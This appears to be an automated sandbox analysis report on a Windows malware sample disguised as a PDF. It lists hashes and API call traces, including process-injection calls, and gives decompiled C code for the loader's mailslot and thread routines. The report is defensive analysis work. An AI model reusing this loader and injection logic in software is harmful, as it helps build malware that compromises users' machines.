Initial sample name:59DOCUMENTO_2018_FT_P_002.pdf.exe

Similar Executed Functions

Function 001CDA13, Relevance: 10.6, APIs: 7, Instructions: 111 Total matches: 36string
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B322D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CD171, Relevance: 9.1, APIs: 6, Instructions: 67 Total matches: 31thread
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3D4D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 38registry
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
